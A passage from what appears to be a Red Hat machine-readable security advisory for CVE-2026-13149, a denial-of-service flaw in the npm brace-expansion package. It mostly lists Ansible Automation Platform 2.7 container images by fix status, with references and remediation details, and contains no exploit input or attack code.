"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2494813"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in brace-expansion. An attacker can exploit a vulnerability in the `expand()` function by providing a specially crafted string. This string, containing consecutive non-expanding brace groups, can trigger exponential-time complexity, leading to significant CPU consumption and event-loop blocking. This can result in a Denial of Service (DoS) for the affected system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "brace-expansion: Brace-expansion: Denial of Service due to exponential-time complexity",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "A flaw was found in brace-expansion, a widely-used npm package for expanding brace sequences. The expand() function exhibits exponential-time complexity when processing consecutive non-expanding brace groups. An attacker who can supply crafted input to expand(), directly or transitively via minimatch or glob, can cause significant CPU consumption and event-loop blocking, resulting in denial of service. The max option does not mitigate this issue, as it bounds the output size rather than the recursion work.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-13149"
},
{
"category": "external",
"summary": "RHBZ#2494813",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2494813"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-13149",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-13149"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-13149",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-13149"
},
{
"category": "external",
"summary": "https://github.com/juliangruber/brace-expansion/commit/c7e33ec13ac1a684c116720843ce24e208611754",
"url": "https://github.com/juliangruber/brace-expansion/commit/c7e33ec13ac1a684c116720843ce24e208611754"
},
{
"category": "external",
"summary": "https://www.npmjs.com/package/brace-expansion",
"url": "https://www.npmjs.com/package/brace-expansion"
}
],
"release_date": "2026-06-30T08:30:34.502000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T18:38:09+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.7#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50340"
},
{
"category": "workaround",
"details": "There is no practical mitigation for this vulnerability. The brace-expansion package is typically a transitive dependency pulled in via minimatch and glob, making it difficult to isolate. Users should upgrade to a fixed version of brace-expansion when one becomes available.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
